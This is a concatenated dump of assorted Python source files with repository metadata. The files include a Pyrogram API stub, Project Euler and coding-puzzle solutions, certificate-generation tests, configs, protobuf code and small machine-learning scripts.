# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class CheckUsername(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0x2714d86c``
Parameters:
username: ``str``
Returns:
``bool``
"""
__slots__: List[str] = ["username"]
ID = 0x2714d86c
QUALNAME = "pyrogram.raw.functions.account.CheckUsername"
def __init__(self, *, username: str) -> None:
self.username = username # string
@staticmethod
def read(data: BytesIO, *args: Any) -> "CheckUsername":
# No flags
username = String.read(data)
return CheckUsername(username=username)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
data.write(String(self.username))
return data.getvalue()
| [
"houwei5163"
] | houwei5163 |
b7d132d47f8448aeb6077d1264063bf458f2674c | e73f0bd1e15de5b8cb70f1d603ceedc18c42b39b | /Project Euler/014 - Collatz sequance.py | d3aabfadf4ae8c3e4f5527c2ef44622211ca50e0 | [] | no_license | thran/the_code | cbfa3b8be86c3b31f76f6fbd1deb2013d3326a4a | ba73317ddc42e10791a829cc6e1a3460cc601c44 | refs/heads/master | 2023-01-05T14:39:16.708461 | 2022-12-25T08:37:39 | 2022-12-25T08:37:39 | 160,978,160 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | def next_collatz(n):
if n % 2 == 0:
return n / 2
return 3 * n + 1
def collatz_lenght(n):
if n == 1: return 1
return collatz_lenght(next_collatz(n)) + 1
m = 0
best = 0
for i in range(1, 10**6):
l = collatz_lenght(i)
if m < l:
m = l
best = i
print m, best | [
"[email protected]"
] | |
44b80c569089638f50802259a2b208a0acc1f02b | ee58b29d8982cc6987b986ee616bc47b6a8d8aa3 | /python/dcp_367_merge_iterators.py | fa15d8ab6be1c94d2399b380055906ae31def2cf | [] | no_license | gubenkoved/daily-coding-problem | 7dd9e0a7ee6606a04cd50fa2766e650da1259f7b | ea8b352b1d3d1f44cd0f04ddaadf3e662f4c85bf | refs/heads/master | 2021-07-03T22:31:50.519730 | 2020-09-27T10:28:09 | 2020-09-27T10:28:09 | 172,369,604 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,255 | py | # This problem was asked by Two Sigma.
#
# Given two sorted iterators, merge it into one iterator.
#
# For example, given these two iterators:
#
# foo = iter([5, 10, 15])
# bar = iter([3, 8, 9])
# You should be able to do:
#
# for num in merge_iterators(foo, bar):
# print(num)
#
# # 3
# # 5
# # 8
# # 9
# # 10
# # 15
#
# Bonus: Make it work without pulling in the contents of the iterators in memory.
def merge(*iterators):
# python iterators do NOT allow to get the current value, so we will have
# to have a separate store
values = [next(iterator) for iterator in iterators]
while True:
if not iterators:
return
# pick the smallest
idx, val = min(enumerate(values), key=lambda x: x[1])
# advance the idx-th pointer
try:
iterator = iterators[idx]
values[idx] = next(iterator)
except StopIteration:
# exhausted iterator, remove it!
del iterators[idx]
del values[idx]
yield val
assert list(merge(iter([1, 2, 3]))) == [1, 2, 3]
assert list(merge(iter([5, 10, 15]), iter(3, 8, 9))) == [3, 5, 8, 9, 10, 15]
assert list(merge(iter([10, 20, 30]), iter([15, 25]), iter([17]))) == [10, 15, 17, 20, 25, 30] | [
"[email protected]"
] | |
4bd60b2710f545f82a96f3c453c1fe5e6af26c4e | 6caab8d886e8bd302d1994ff663cf5ccb5e11522 | /MyNotes_01/Step01/4-CORE/day02_15/demo04.py | 899097f7197eb4379f74f3afa0259428d5a3dcf2 | [] | no_license | ZimingGuo/MyNotes01 | 7698941223c79ee754b17296b9984b731858b238 | 55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6 | refs/heads/master | 2022-07-30T21:30:32.100042 | 2020-05-19T16:59:09 | 2020-05-19T16:59:09 | 265,254,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,200 | py | # author: Ziming Guo
# time: 2020/2/24
"""
demo04:
异常处理
练习:exercise03.py
"""
def div_apple(apple_count):
# ValueError
person_count = int(input("请输入人数:"))
# ZeroDivisionError
result = apple_count / person_count
print("每人%d个苹果"%result)
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
"""
"""
# "建议"分门别类的处理
try:
# 可能出错的代码
div_apple(10)
except ValueError:
print("输入的人数必须是整数")
except ZeroDivisionError:
print("输入的人数不能是零")
except Exception: # 这句话一般是写在最后的,以上错误都不属于才会执行这句话
print("未知错误")
"""
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
else:
# 如果异常,不执行else语句.
print("没有出错")
"""
try:
# 可能出错的代码
div_apple(10)
finally:
# 无论是否异常,一定会执行的代码.
print("finally")
# 作用:不能处理的错误,但是一定要执行的代码,就定义到finally语句中。
print("后续逻辑.....")
| [
"[email protected]"
] | |
dda479fe3985fbe635d716f2b72e44d05c545d36 | 016109b9f052ffd037e9b21fa386b36089b05813 | /checkTree.py | 824b6551f6e8aaa158948abc4cfda4bca896f43e | [] | no_license | nsshayan/DataStructuresAndAlgorithms | 9194508c5227c5c8c60b9950917a4ea8da8bbab2 | 2f7ee1bc8f4b53c35d1cce62e898a9695d99540a | refs/heads/master | 2022-09-29T21:15:33.803558 | 2022-09-08T17:14:59 | 2022-09-08T17:14:59 | 73,257,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 308 | py | '''
Given :-
the number of nodes in a graph
the degree of each of the vertices
Find whether the given graph is tree or not
'''
N = int(raw_input())
Degree = raw_input().split(" ")
sum = 0
for i in range(len(Degree)):
sum = sum + int(Degree[i])
if sum/2 == N-1:
print "YES"
else :
print "NO" | [
"[email protected]"
] | |
b6faf20877f683beab77c503370315724c92cdac | 5fb579602489728ac47e195bd15838eb632aece4 | /tests/test_utils.py | 99a1fd9fe74c0728ba2a92baf3a1f722c68f4174 | [
"MIT"
] | permissive | Cesare-Liu/cryptokit | 6101701f3daec60ce8ca2f8a2bb464a58ccae20e | bfb90c229279c3c755bdbedfe659d7d5b6e65b51 | refs/heads/master | 2020-03-27T10:38:20.714133 | 2018-06-07T06:15:51 | 2018-06-07T06:15:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,410 | py | # coding: utf-8
"""test utils."""
from __future__ import unicode_literals
import datetime
from unittest import TestCase
from cryptokit.rsa import RSACrypto
from cryptokit.utils import (load_pfx, generate_certificate, generate_pfx,
get_pubkey_from_pfx)
class UtilTestCase(TestCase):
"""RSACrypto useage test."""
def setUp(self):
private_key = RSACrypto.generate_private_key(2048)
RSACrypto.dump_private_key_pem(private_key)
self.private_key = private_key
self.public_key = private_key.public_key()
validity = datetime.timedelta(days=365)
self.not_valid_before = datetime.datetime.today()
self.not_valid_after = self.not_valid_before + validity
payload = {
'common_name': 'CA',
'country_name': 'CN',
'email_address': '[email protected]',
'org_name': '数字认证中心',
'company_name': '编程猫科技',
'state_or_province': '浙江省',
'locality_name': '杭州市',
'private_key': self.private_key,
'public_key': self.public_key,
'serial_number': 9219100179121295299
}
self.payload = payload
def test_generate_certificate(self):
"""Test generate certificate."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
self.assertEqual(cert.serial_number, self.payload['serial_number'])
def test_generate_pfx(self):
"""Test generate pfx."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
pfx = generate_pfx(
cert, self.payload['company_name'], self.private_key)
pkcs12 = load_pfx(pfx)
self.assertEqual(
cert.serial_number,
pkcs12.get_certificate().get_serial_number()
)
def test_get_pubkey_from_pfx(self):
"""Test get_pubkey_from_pfx."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
pfx_file = generate_pfx(
cert, self.payload['company_name'], self.private_key)
pubkey = get_pubkey_from_pfx(pfx_file, password=None)
self.assertEqual(cert.public_key().public_numbers(),
pubkey.public_numbers())
| [
"[email protected]"
] | |
d152111c4317b9090484c966da3a4671a305c7de | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02755/s084222637.py | a56cd5d0e5b0b0922a2417c7c93736a84b7a05d5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | a,b=map(int,input().split())
for i in range(100001):
if int(i*0.08) == a and int(i*0.1) == b:
print(i)
break
else:
print(-1) | [
"[email protected]"
] | |
76da4859384e1d8a645aaf5c79f6116f3d66c864 | 38c35956be6343855914b1c58b8fbd2e40c6e615 | /Strings/2023.py | 449cb787bc1f493dc6d2d3557856b2f76693cf95 | [] | no_license | LucasBarbosaRocha/URI | b43e4f4a6b3beed935f24839001bea354411c4bd | 2c9bcc13300a9f6243242e483c8f9ec3296a88ad | refs/heads/master | 2020-06-25T05:06:51.297824 | 2019-08-22T04:50:11 | 2019-08-22T04:50:11 | 199,210,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | lista = []
l = ""
while True:
try:
entrada = input()
l = l + entrada + "+"
except :
break
#print (l)
l = l[:len(l) - 1]
original = l.split("+")
lista = l.lower()
lista = lista.split("+")
lista.sort()
escolhido = lista[len(lista) - 1]
for i in range(len(original)):
if (escolhido == original[i].lower()):
print (original[i])
break
| [
"[email protected]"
] | |
58412d85187532f9f42d4f40e1c022211b03d8f3 | 4e1af52e60dd997fca04be3485e157292cf84b6a | /2020/tests/test_day08.py | c14b7db55c5cf09e4fcbd77b7364367ebec9a8fd | [
"MIT"
] | permissive | JesperDramsch/advent-of-code | e0173d4e78cf274ae461b39d619f56a03ef54773 | ccad3d578be473bf44dea7284c2f99fd67f3271c | refs/heads/main | 2023-01-13T07:18:30.772913 | 2022-12-25T16:12:02 | 2022-12-25T16:39:53 | 160,000,829 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | import sys
import pytest
sys.path.insert(0, ".")
from util import Day
from day08 import *
@pytest.fixture(scope="function")
def day():
day = Day(8)
day.load(typing=str)
return day
def test_example(day):
data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
day.load(data, typing=str)
assert main(day, part=1) == 5
def test_example_p2(day):
data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
day.load(data, typing=str)
assert main(day, part=2) == 8
def test_part1(day):
assert main(day, part=1) == 1753
def test_part2(day):
assert main(day, part=2) == 733
| [
"[email protected]"
] | |
b207fefd6ccd6d562f1572e2426380b43b6f1983 | 76563ffc91a6f35ffab2986693f0124a3a3aaf86 | /Crawler/2-DecisionTreeClassifier.py | 4f7047571f73169fdfd436414573723cf4d2f024 | [] | no_license | zelenkastiot/FCSE-Data-Mining | ab7aea21402742c518857a1c871d3e0a033f8581 | 6e1ffbada09784bb846af54aefc57fe0eb257a17 | refs/heads/master | 2023-02-27T17:14:10.457335 | 2021-02-07T22:13:20 | 2021-02-07T22:13:20 | 289,999,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | """
Created on 15-Jan-21
@author: Kiril Zelenkovski
"""
import math
from sklearn.preprocessing import OrdinalEncoder, LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import CategoricalNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
import pandas as pd
# Read csv
dataset = pd.read_csv("dataset.csv")
dataset = dataset.drop("Address Region", 1)
dataset = dataset.drop("Street Address", 1)
dataset = dataset.drop("Address Locality", 1)
dataset = dataset.drop("Postal Code", 1)
dataset = dataset.drop("Price", 1)
dataset = dataset.drop("Beds", 1)
print(dataset)
columns = dataset.columns.tolist()
dataset = dataset.values.tolist()
# Use Ordinal Encoder to encode categorical features as an integer array
encoder = OrdinalEncoder()
encoder.fit([dataset[j][:-1] for j in range(0, len(dataset))])
# Split dataset 75% train, 25% test
# test_csv = dataset[math.ceil(0.75 * len(dataset)):]
# train_csv = dataset[0:math.ceil(0.75 * len(dataset))]
X_dataset = [dataset[j][:-1] for j in range(0, len(dataset))]
y_dataset = [dataset[j][-1] for j in range(0, len(dataset))]
X, X_test, y, y_test = train_test_split(X_dataset,
y_dataset,
test_size=0.2,
random_state=42)
# Call encoder.transform or encoder.fit_transform to transform the data (because it is strings and int)
X = encoder.transform(X)
# Decision Tree Classifier: A non-parametric supervised learning method used for classification
classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)
# Fit Decision Tree Classifier according to X, y
classifier.fit(X, y)
# Call encoder.transform to transform the data
X_test = encoder.transform(X_test)
# Print accuracy using imported metrics
y_predicted = [classifier.predict([x])[0] for x in X_test]
print(f'DecisionTreeClassifier accuracy: {accuracy_score(y_test, y_predicted, normalize=True):.4f}')
# Print depth for classifier
print('Depth:', classifier.get_depth())
# Print # of leaves for classifier
print('Number of leaves:', classifier.get_n_leaves())
# Load importance of features in list
feature_importance = list(classifier.feature_importances_)
# Most and least important feature
most_important_feature = feature_importance.index(max(feature_importance))
least_important_feature = feature_importance.index(min(feature_importance))
# Print both
print('Most important feature:', columns[most_important_feature])
print('Least important feature:', columns[least_important_feature])
print(feature_importance)
for i in range(0, len(feature_importance)):
print(columns[feature_importance.index(feature_importance[i])])
print(y_predicted)
print(y_test)
le = LabelEncoder()
le.fit([dataset[j][-1] for j in range(0, len(dataset))])
list(le.classes_)
y_predicted = le.transform(y_predicted)
y_test = le.transform(y_test)
print(y_predicted)
print(y_test) | [
"[email protected]"
] | |
2ebbafa1c2d6e457a74cceb59b8ab893eab097ca | c5f58af61e3577ded52acda210f4f664651b598c | /template/mmdetection/configs/fpg/retinanet_r50_fpg_crop640_50e_coco.py | 6c517c9bfc6efebd56f35173b33505ea42865e03 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hojihun5516/object-detection-level2-cv-02 | 0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac | bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109 | refs/heads/master | 2023-08-31T09:50:59.150971 | 2021-10-16T15:00:19 | 2021-10-16T15:00:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,470 | py | _base_ = "../nas_fpn/retinanet_r50_nasfpn_crop640_50e_coco.py"
norm_cfg = dict(type="BN", requires_grad=True)
model = dict(
neck=dict(
_delete_=True,
type="FPG",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
inter_channels=256,
num_outs=5,
add_extra_convs=True,
start_level=1,
stack_times=9,
paths=["bu"] * 9,
same_down_trans=None,
same_up_trans=dict(
type="conv",
kernel_size=3,
stride=2,
padding=1,
norm_cfg=norm_cfg,
inplace=False,
order=("act", "conv", "norm"),
),
across_lateral_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
across_down_trans=dict(
type="interpolation_conv",
mode="nearest",
kernel_size=3,
norm_cfg=norm_cfg,
order=("act", "conv", "norm"),
inplace=False,
),
across_up_trans=None,
across_skip_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
output_trans=dict(type="last_conv", kernel_size=3, order=("act", "conv", "norm"), inplace=False),
norm_cfg=norm_cfg,
skip_inds=[(0, 1, 2, 3), (0, 1, 2), (0, 1), (0,), ()],
)
)
evaluation = dict(interval=2)
| [
"[email protected]"
] | |
c89927df7078e8bf390e1f73ca56617223ac32d4 | cef4f2e3357577bf56d3181dba988d0006d796b9 | /Projects/CourseInfo/Services/BussinessLogicServices/CourseService-old.py | 3ecae3d629720953d59c8dacbef0d7c8def24fd4 | [] | no_license | IshaShah27/E6156F21 | 5256715399f58d5f03dc6b4b8cf8e3920eb55bc7 | 8769203cf61a5ca96d5baa5ad1be34b1031ffffe | refs/heads/main | 2023-08-26T22:07:13.469515 | 2021-10-18T21:31:01 | 2021-10-18T21:31:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,613 | py | import Services.DataAccessServices.CourseWorksAdapter as cw_adapter
class Student():
def __init__(self, context, j_data):
self._context = context
self.id = j_data["id"]
self.user_id = j_data["sis_user_id"]
self.login_id = j_data["login_id"]
name_fields = j_data["sortable_name"].split(",")
self.name = {
"last_name": name_fields[0],
"first_name": name_fields[1]
}
def to_json(self):
result = {}
result["id"] = self.id
result["name"] = self.name
result["user_id"] = self.user_id
result["login_id"] = self.login_id
return result
class Course():
_field_list = ["id", "name", "uuid", "course_code_full", "course_no", "section", "year", "semester"]
def __init__(self, context, j_data):
self._context = context
self.id = j_data["id"]
self.name = j_data["name"]
self.uuid = j_data["uuid"]
self.course_code_full = j_data["course_code"]
course_code_fields = self.course_code_full.split("_")
self.course_no = course_code_fields[0]
self.section = course_code_fields[1]
self.year = course_code_fields[2]
self.semester = course_code_fields[3][0]
def to_json(self):
result = {}
for f in Course._field_list:
result[f] = getattr(self, f)
return result
@classmethod
def set_context(cls, context):
cls._context = context
@classmethod
def get_courses(cls, role=None):
res = cw_adapter.Adapter.set_context(cls._context)
res = cw_adapter.Adapter.get_courses(role=role)
if res is not None and len(res) > 0:
result = []
for j_data in res:
result.append(Course(cls._context, j_data))
else:
result = None
return result
@classmethod
def get_course(cls, course_id):
res = cw_adapter.Adapter.set_context(cls._context)
res = cw_adapter.Adapter.get_courses(course_id=course_id)
if res is not None and len(res) > 0:
res_in = res[0]
result = Course(cls._context, res_in)
else:
result = None
return result
def get_students(self):
res = cw_adapter.Adapter.set_context(self._context)
res = cw_adapter.Adapter.get_students(self.id)
if res[0] == 200:
result = []
for j_data in res[1]:
result.append(Student(self._context, j_data))
else:
result = None
return result
| [
"[email protected]"
] | |
e32ac73c3af16ed8be75891963807a7fb28d0ba1 | bc441bb06b8948288f110af63feda4e798f30225 | /next_builder_sdk/model/flowable/process_instance_pb2.py | a763c2c5d25ebaa8d7f7708cb7b4d2a1e212f761 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 10,254 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: process_instance.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from next_builder_sdk.model.flowable import process_variable_pb2 as next__builder__sdk_dot_model_dot_flowable_dot_process__variable__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='process_instance.proto',
package='flowable',
syntax='proto3',
serialized_options=_b('ZBgo.easyops.local/contracts/protorepo-models/easyops/model/flowable'),
serialized_pb=_b('\n\x16process_instance.proto\x12\x08\x66lowable\x1a\x36next_builder_sdk/model/flowable/process_variable.proto\"\xb9\x03\n\x17\x46lowableProcessInstance\x12\n\n\x02id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x13\n\x0b\x62usinessKey\x18\x03 \x01(\t\x12\x11\n\tsuspended\x18\x04 \x01(\x08\x12\r\n\x05\x65nded\x18\x05 \x01(\x08\x12\x1b\n\x13processDefinitionId\x18\x06 \x01(\t\x12\x1d\n\x15processDefinitionName\x18\x07 \x01(\t\x12$\n\x1cprocessDefinitionDescription\x18\x08 \x01(\t\x12\x12\n\nactivityId\x18\t \x01(\t\x12\x13\n\x0bstartUserId\x18\n \x01(\t\x12\x12\n\ncallbackId\x18\x0b \x01(\t\x12\x14\n\x0c\x63\x61llbackType\x18\x0c \x01(\t\x12\x13\n\x0breferenceId\x18\r \x01(\t\x12\x15\n\rreferenceType\x18\x0e \x01(\t\x12\x10\n\x08tenantId\x18\x0f \x01(\t\x12\x11\n\tcompleted\x18\x10 \x01(\x08\x12\x11\n\tstartTime\x18\x11 \x01(\t\x12\x34\n\tvariables\x18\x12 \x03(\x0b\x32!.flowable.FlowableProcessVariableBDZBgo.easyops.local/contracts/protorepo-models/easyops/model/flowableb\x06proto3')
,
dependencies=[next__builder__sdk_dot_model_dot_flowable_dot_process__variable__pb2.DESCRIPTOR,])
_FLOWABLEPROCESSINSTANCE = _descriptor.Descriptor(
name='FlowableProcessInstance',
full_name='flowable.FlowableProcessInstance',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='flowable.FlowableProcessInstance.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='flowable.FlowableProcessInstance.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='businessKey', full_name='flowable.FlowableProcessInstance.businessKey', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='suspended', full_name='flowable.FlowableProcessInstance.suspended', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ended', full_name='flowable.FlowableProcessInstance.ended', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='processDefinitionId', full_name='flowable.FlowableProcessInstance.processDefinitionId', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='processDefinitionName', full_name='flowable.FlowableProcessInstance.processDefinitionName', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='processDefinitionDescription', full_name='flowable.FlowableProcessInstance.processDefinitionDescription', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activityId', full_name='flowable.FlowableProcessInstance.activityId', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='startUserId', full_name='flowable.FlowableProcessInstance.startUserId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callbackId', full_name='flowable.FlowableProcessInstance.callbackId', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callbackType', full_name='flowable.FlowableProcessInstance.callbackType', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='referenceId', full_name='flowable.FlowableProcessInstance.referenceId', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='referenceType', full_name='flowable.FlowableProcessInstance.referenceType', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tenantId', full_name='flowable.FlowableProcessInstance.tenantId', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='completed', full_name='flowable.FlowableProcessInstance.completed', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='startTime', full_name='flowable.FlowableProcessInstance.startTime', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='variables', full_name='flowable.FlowableProcessInstance.variables', index=17,
number=18, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=93,
serialized_end=534,
)
_FLOWABLEPROCESSINSTANCE.fields_by_name['variables'].message_type = next__builder__sdk_dot_model_dot_flowable_dot_process__variable__pb2._FLOWABLEPROCESSVARIABLE
DESCRIPTOR.message_types_by_name['FlowableProcessInstance'] = _FLOWABLEPROCESSINSTANCE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
FlowableProcessInstance = _reflection.GeneratedProtocolMessageType('FlowableProcessInstance', (_message.Message,), {
'DESCRIPTOR' : _FLOWABLEPROCESSINSTANCE,
'__module__' : 'process_instance_pb2'
# @@protoc_insertion_point(class_scope:flowable.FlowableProcessInstance)
})
_sym_db.RegisterMessage(FlowableProcessInstance)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
8c626ab93dbf410bba8151b8cdd660481d96c411 | a2c575fe2cf4afa40ec2adb8d5b98ec47693665b | /thread_api/model_builder.py | 1408f69c6ff601cbc6c4b8fa998e7f5224c3adaf | [] | no_license | cosmicBboy/confesh-bots | b530ba866fee5d276a8428670f2b2fb3a3f1ca3b | e1115a7c3f3cfb13d5b2e185c0b9410ccc09f5e4 | refs/heads/master | 2021-03-19T08:28:25.579876 | 2018-04-12T20:13:05 | 2018-04-12T20:13:05 | 44,482,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,796 | py | '''Module for Building a Model
Train a Word2Vec Model based on secret and comment text on www.confesh.com
1. Read secret and comment text
2. Train a Word2Vec model
3. Serialize model to S3
'''
import logging
import pandas as pd
import mongo_creds as creds
import json
import sys
import smart_open as so
from collections import OrderedDict
from argparse import ArgumentParser
from gensim.models import Word2Vec
from stream_mongo import MongoStreamer
from preprocessor import TextPreprocessor
from s3_utils import create_model_key
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
tp = TextPreprocessor()
class Word2VecModelBuilder(object):
def __init__(self, params):
self.model = Word2Vec
self.params = params
def fit(self, train_docs):
token_list = [tp.preprocess(d['text']) for d in train_docs]
self.model = self.model(token_list, **self.params)
def save_model(self, model_name, document_ids):
s3_keys = self._get_s3_keys(model_name)
self.model.save(s3_keys['model'])
with so.smart_open(s3_keys['params'], 'wb') as fout:
fout.write(json.dumps(self.params, sort_keys=True))
with so.smart_open(s3_keys['doc_ids'], 'wb') as fout:
for i in document_ids:
fout.write(i + '\n')
def load_model(self, model_name):
s3_keys = self._get_s3_keys(model_name)
self.model = self.model.load(s3_keys['model'])
def _get_s3_keys(self, model_name):
return {
'model': create_model_key(model_name, 'model', 'w2v'),
'params': create_model_key(model_name, 'params', 'json'),
'doc_ids': create_model_key(model_name, 'doc_ids', 'txt')
}
| [
"[email protected]"
] | |
1a95ee42312d01afa32e915af2536f8f124984c7 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/denonavr/receiver.py | 28969d2579256202064fcda1e7a514fa6498a181 | [
"Apache-2.0"
